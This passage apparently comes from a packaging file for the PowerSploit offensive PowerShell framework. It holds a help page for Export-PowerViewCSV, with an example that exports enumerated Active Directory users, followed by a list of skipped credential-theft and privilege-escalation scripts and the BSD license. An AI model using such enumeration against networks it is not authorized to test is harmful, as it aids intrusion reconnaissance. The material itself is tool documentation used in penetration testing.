 Get-DomainUser | Export-PowerViewCSV -Path "users.csv" -Append -Delimiter '|'
 ```
 .
 ## PARAMETERS
 .
 ### -InputObject
 Specifies the objects to export as CSV strings.
 .
 ```yaml
 Type: PSObject[]
 Parameter Sets: (All)
 Aliases:
 .
 Required: True
 Position: Named
 Default value: None
 Accept pipeline input: True (ByPropertyName, ByValue)
 Accept wildcard characters: False
 ```
 .
 ### -Path
 Specifies the path to the CSV output file.
 .
 ```yaml
 Type: String
 Parameter Sets: (All)
 Aliases:
 .
 Required: True
 Position: 2
 Default value: None
 Accept pipeline input: False
 Accept wildcard characters: False
 ```
 .
 ### -Delimiter
 Specifies a delimiter to separate the property values.
 The default is a comma (,)
 .
 ```yaml
 Type: Char
 Parameter Sets: (All)
 Aliases:
 .
 Required: False
 Position: 3
 Default value: ,
 Accept pipeline input: False
 Accept wildcard characters: False
 ```
 .
 ### -Append
 Indicates that this cmdlet adds the CSV output to the end of the specified file.
 Without this parameter, Export-PowerViewCSV replaces the file contents without warning.
 .
 ```yaml
 Type: SwitchParameter
 Parameter Sets: (All)
 Aliases:
 .
 Required: False
 Position: Named
 Default value: False
 Accept pipeline input: False
 Accept wildcard characters: False
 ```
 .
 ## INPUTS
 .
 ### PSObject
 .
 Accepts one or more PSObjects on the pipeline.
 .
 ## OUTPUTS
 .
 ## NOTES
 .
 ## RELATED LINKS
 .
 [http://poshcode.org/1590
 http://dmitrysotnikov.wordpress.com/2010/01/19/Export-Csv-append/](http://poshcode.org/1590
 http://dmitrysotnikov.wordpress.com/2010/01/19/Export-Csv-append/)

#----------------------------------------------------------------------------
# xml and html files (skipped):
#         Privesc/PowerUp.ps1
#         Exfiltration/Get-VaultCredential.ps1xml

#----------------------------------------------------------------------------
# huge files   (skipped):
#         Exfiltration/Invoke-Mimikatz.ps1

#----------------------------------------------------------------------------
# Files marked as NO_LICENSE_TEXT_FOUND may be covered by the following
# license/copyright files.

#----------------------------------------------------------------------------
# License file: LICENSE
 PowerSploit is provided under the 3-clause BSD license below.
 .
 *************************************************************
 .
 Copyright (c) 2012, Matthew Graeber
 All rights reserved.
 .
 Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
 .
     Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
     Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
     The names of its contributors may not be used to endorse or promote products derived from this software without specific prior written permission.
 .
 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
 .
 .
